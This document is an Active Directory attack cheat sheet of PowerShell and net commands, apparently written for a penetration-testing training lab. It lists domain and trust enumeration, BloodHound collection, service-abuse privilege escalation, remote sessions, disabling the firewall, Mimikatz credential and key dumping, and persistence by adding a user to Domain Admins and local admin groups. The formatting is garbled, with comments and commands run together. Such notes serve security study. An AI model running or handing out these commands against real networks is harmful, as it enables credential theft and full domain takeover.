# UsersGet-NetUser# To list a specific property of all the users, say, samaccountnameGet-ADUser-Filter *| Select -ExpandProperty samaccountname# computersGet-NetComputer# Now, to enumerate member computers in the domain we can use Get-ADComputerGet-ADComputer –Filter *| select –expand name# domain adminGet-NetDomain# To see attributes of the Domain Admins groupGet-ADGroup-Identity 'Domain Admins'-Properties *# See Attributes of the Domain Admins GroupGet-NetGroup-GroupName "Domain Admins"-FullData# To enumerate members of the Domain Admins groupGet-ADGroupMember-Identity 'Domain Admins'# Get Members of the Domain Admins groupGet-NetGroupMember-GroupName "Domain Admins"# To enumerate members of the Enterprise Admins group:Get-ADGroupMember-Identity 'Enterprise Admins'-Server techcorp.local# ForestGet-NetDomainTrustGet-NetForestDomain|Get-NetDomainTrust# If bidirectionalGet-NetForestDomain-Forest eurocorp.local -Verbose |Get-NetDomainTrust#Kerberoastable usersGet-NetUser-SPN # Bloodhound. .\SharpHound.ps1Invoke-BloodHound-CollectionMethod All,LoggedOn# SQLImport-Module .\PowerUpSQL.psd1Get-SQLInstanceDomain
3. Domain Admin Priv Esc
NOTE : ONCE A LOCAL ADMINISTRATOR RUN PS as ADMINISTRATOR
# PowerupsInvoke-Allchecks# Abusing servicesInvoke-ServiceAbuse-Name 'AbyssWebServer'-UserName 'dcorp\student21'# Run mimikatzInvoke-Mimikatz
4. Domain Admin Priv Esc
# Local admin userFind-LocalAdminAccess-VerboseInvoke-UserHunter-CheckAccess -Verbose# Enter session$sess =New-PSSession-ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local$sessEnter-PSSession-Session $sess# language mode$ExecutionContext.SessionState.LanguageMode# applocker Get-AppLockerPolicy-Effective | select -ExpandProperty RuleCollections# Disable FireWall !!!# Mimikatz# Modify to make it work without dot sourcingwget or curl or iex(iwr).\Invoke-Mimikatz.ps1
5. Domain Admin Persistence
Invoke-Mimikatz# note the rc4Invoke-Mimikatz-Command '"sekurlsa::ekeys"'Invoke-Mimikatz-Command '"token::elevate" "vault::cred /patch"'
Extras
# Once you are DA add user to DA groupInvoke-Command -ScriptBlock {net group "DOMAIN ADMINS" student21 /domain /add} -ComputerName dcorp-dc.dollarcorp.moneycorp.local
C:> net localgroup Administrators student21 /add C:> net localgroup "Remote Desktop Users" student21 /addhttps://docs.microsoft.com/en-us/sysinternals/downloads/psexec
net localgroup administrators# add to localgroup adminsnet localgroup Administrators student21 /add # add to RDP groupnet localgroup "Remote Desktop Users" student21 /add# Add to DA net group "DOMAIN ADMINS" student21 /domain /add# Checking First Degree Object Controls# if the user is part of a group example sql admins and has generic all access we can do the followingnet group "SQLMANAGERS" examAd /domain /add